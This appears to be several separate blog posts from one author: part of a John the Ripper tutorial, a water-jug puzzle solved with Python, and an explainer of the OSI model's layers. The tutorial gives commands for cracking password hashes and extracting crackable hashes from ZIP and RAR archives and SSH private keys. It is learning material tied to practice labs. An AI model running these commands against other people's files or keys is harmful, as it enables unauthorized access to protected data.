Incremental mode is the most powerful cracking mode. It tries every single possible combination of characters until it completes. This means it will not stop. Example usage:

john --incremental hash.txt

You can specify the option for the incremental mode by:

john --incremental=digits incremental.txt
john --incremental=Alpha incremental.txt

You can see all the options in the john.conf in /etc/john/john.conf .

Identifying hashes

John's auto hash detection can be a bit unreliable. Here, is a good script for identifying hashes in python.

Format-specific Cracking

john --format=[format] [path to file]

--format= - Input the format of the hash

Example Usage:

john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash_to_crack.txt

Notes:

If you are unsure about telling John which hash type to crack, use john --list=formats. If you are search for a specific type of hash use john --list=formats | grep -iF "md5", if you are on Linux.

Cracking Multiple files

To crack multiple files that have the same encryption just add them both to the end. The syntax for multiple md5 hashes is as so: john [file 1][file 2]

john -form=raw-md5 crack.txt md5.txt

Cracking other files

Sometimes the hash is not easy to extract from a file. That is when Jumbo John comes in handy. It has a bunch of different tools for extracting hashes out of other formats. I will cover a few here.

Zip2John

We are going to use zip2john to output a hash in a text file. This can then be attacked like a normal hash.

zip2john [options] [zip file] > [output file]

Example Usage:

zip2john zipfile.zip > zip_hash.txt

Rar2John

Almost identical to the zip2john tool, we can output a RAR file to a hash text file. John will be able to understand this.

rar2john [rar file] > [output file]

Example Usage:

rar2john rarfile.rar > rar_hash.txt

SSH2John

You know, I wonder if their is a pattern to this? You can find your pub id_rsa private key in linux at ~/. ssh/id_rsa

ssh2john [id_rsa private key file] > [output file]

Example Usage:

ssh2john id_rsa > id_rsa_hash.txt

Practise

If you want to practice some hash cracking, here are some hashes.

Sources

https://tryhackme.com/room/johntheripper0

https://www.hackingarticles.in/beginner-guide-john-the-ripper-part-1/

https://www.varonis.com/blog/john-the-ripper

Documentation

https://www.openwall.com/john/doc/

https://github.com/openwall/john

You might not have seen this particular problem but you have definitely heard of a problem like this. But what many people do not know about this problem is you can actually solve it using the points of a Parallelogram or what some people call a pool table. If you translate your starting amount of water as 5 litres in the 5-litre jug, then you can translate it to (0,5). You can keep it bouncing off the points until you desired amount in the x or y. The parallelogram does the exact same thing as what we just did in the table above.

I found that it was easier to find the patterns if I made the parallelogram a rectangle. There are 4 different variables you need to use this. The current x and y, the method you are using and the side & top length. Once you have those 4 variables you can make any table. I strongly recommend following each line with your finger as I tell you the rules:

Phesudocode

The Total Method:

The Total Method is when you add up the x and y and then flip it to the other side of the rectangle. If you look at the start point of the line and the endpoint of the line then the x+y will equal the same. There are 2 rules in the total method

1. if the red line is going horizontally down, then return the number that is minimum of (top length or x+y) and they as the maximum number that is either ((x+y- top length) or 0).

   How does rule 1 work?

   Count until you reach x+y from the bottom left to the bottom right and go up the right line if you reach it.
2. If the red line is going horizontally up then return x as the maximum of either ((x+y)- side length or 0) and the y as the minimum of either (side length or (x+y).

   How does rule 2 work?

   Count until you reach x+y from the bottom left to the top of the left line and go up the right line until you reach it.

The Swap Method:

The swap method swaps the x or y depending on which line it is on. The swap method is made up of 4 smaller rules that each change specific variables in the coordinates depending on which side of the rectangle you are using the swap method on.

1. if x = 0 then return the top length and y This is done as we need to flip 0,2 to
2. if y = 0 then return x with side length
3. if y = the side length then return x and 0
4. if x = the top length then return 0 and y

Extra rules:

We can also find out that to start the bouncing of the parallelogram, it will always start with the total method and then switch to the swap method and then back to the total method and so on.

Python code

The Swap Method

jugs = []
numberOfJugs = 2


def swapMethod(x,y, tLength, sLength):   
    #input:(0, y) output: (tLength, y)
    if x == 0:
        print("added")
        return tLength, y

    #input: (x, 0) output: (x, min)
    elif y == 0:
        print("else ", x, sLength)
        return x,sLength

    #input: (x, sLength) output: (x, 0)    
    elif y == sLength:
        print("x: ",x, "y: ", y,)
        return x,0    

    #Input:(tLength, y) output:(0, y)
    elif x == tLength:
        print(0,y)
        return 0,y
...

The Total Method

...
def totalMethod(x,y, maxi, minu):  
    #Going horizontally down
    if x == 0 or y == minu:
        return min(maxi, (x+y)), max((x+y-maxi), 0)
    #Going horizontally up
    else:
        return max((x+y-minu), 0), min(minu, (x+y))   

...

The calling

...
targetCapacity = 6 # Change this
tLength, sLength = 7,5 #Change this
x,y = 0,5 # Change this
history = f'''
_____{tLength}___{sLength}_|
01 | {x} | {y} |
'''
# First time one will always be the Total method
x,y = totalMethod(x,y, tLength, sLength)
past = 0
history += f'02 | {x} | {y} |\n'
for i in range(0,10):
    if x == targetCapacity or y == targetCapacity:
        break
    if past == 0: # calls swapmethod
        x,y = swapMethod(x,y,tLength,sLength)
        past = 1
    else: #calls totalMethod
        x,y = totalMethod(x,y, tLength, sLength)
        past = 0
    history += f'{i+3:02} | {x} | {y} |\n'
print(history)

Full code here

Closing notes

If you want to see a more complete version with inputs look on my GitHub here. Thanks to my math teacher for showing me this problem. It was a fun challenge.

The OSI model (or Open Systems Interconnection Model) is a conceptual model created by ISO (International Organization for Standardization) which allows many different types of systems to communicate together. The OSI model consists of seven different layers that each have its own unique purpose and responsibilities.

7 Application

The application is the only layer that directly communicates with the user. You can think of the application layer as the Graphical User Interface (GUI) of the OSI model. The application layer includes protocols such as HTTP or SMTP (Simple Mail Transfer Protocol).

6 Presentation

This presentation layer is responsible for prepping and standardization for the application layer. in plain English, it is a translater for the application. If two devices are communicating using different encoding methods, layer 6 will be responsible for translating it. This layer can also handle encryption and compression.

5 Session

The session layer is responsible for opening and closing a stable communication between two devices. This layer can also be responsible for synchronizing with checkpoints. For example, if you were downloading a 200MB video and it has a checkpoint every 5MB, and it fails at 143MB due to a server disconnect. You could resume that video at 140MB. Something worth noting is that every session is unique, which means that data cannot travel over different sessions.

4 Transport

The transport layer is a vital part of the transmission of data across a network. This includes taking the data from the session layer and breaking it up into chunks before sending it to layer 3. This transport layer is also responsible for reassembling all the chunks into complete data for the session layer to use. This is mainly done using two protocols UDP and TCP.

TCP

The Transmission Control Protocol (TCP) is a protocol designed for reliability.

• A connection-oriented protocol (requires an established connection to transmit data).
• Extensive error checking and acknowledgment of data.
• is very reliable
• Used in HTTPS, HTTP, SMTP, etc

UDP

The User Datagram Protocol (UDP) is a simpler protocol designed with speed in mind.

• Connectionless Internet protocol
• Very basic error checking
• Is very fast
• Mainly used in streaming video

3 Network

The Network layer is used to route packets threw two different networks. Everything is communicated threw IP addresses in this layer. The network layer tries to find the optimal "path", also called routing, using protocols such as OSPF (Open Shortest Path First) and RIP (Routing Information Protocol).

2 Data Link

The Data link layer is similar to the network layer but the data link facilitates data transfers between two devices on the same network. They transfer data using a MAC Address in this layer.

1 The Physical Layer

This is the easiest layer to understand. To put it simply, this is the physical hardware that deals with data transfers, such as cables and switches. Both sides of the physical layer must agree on a convention to tell apart the 1s and 0s.

Sources

These are some great sources if you want to work more:

• https://tryhackme.com/room/osimodelzi
• https://www.cloudflare.com/en-au/learning/ddos/glossary/open-systems-interconnection-model-osi/
• https://www.forcepoint.com/cyber-edu/osi-model
• https://testbook.com/learn/osi-model-open-systems-interconnection/